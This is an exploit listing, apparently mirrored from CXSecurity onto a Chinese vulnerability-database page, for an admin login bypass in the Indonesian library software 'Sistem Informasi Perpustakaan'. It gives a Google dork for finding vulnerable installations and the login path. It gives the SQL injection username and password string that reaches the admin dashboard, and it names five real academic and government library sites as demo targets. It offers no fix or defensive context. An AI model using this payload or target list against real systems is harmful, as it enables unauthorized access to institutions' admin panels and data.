Sistem Informasi Perpustakaan Admin Login Bypass - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209566 漏洞类型
发布时间 2018-06-10 更新时间 2018-06-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060088
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
***************************************************
# Exploit Title: Sistem Informasi Perpustakaan Admin Login Bypass
# Google Dork: inurl:/depan/cari_buku
# Exploit: /apps/login
# Date: 09/06/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Give target with exploit ( /apps/login )
[+] Enter username and password with
[+] Username: '=''or'
[+] Password: '=''or'
[+] Vuln? You redirected to dashboard
***************************************************
[+] Demo Site
[+] http://library.akbid-alikhlas.ac.id/apps/login
[+] http://elibrary.stebisigm.ac.id/apps/login
[+] http://www.siperpus.pa-banggai.go.id/apps/login
[+] https://library.giciku.ac.id/apps/login
[+] http://www.simpus.stkip-m-barru.com/apps/login
***************************************************
Thanks To Error Violence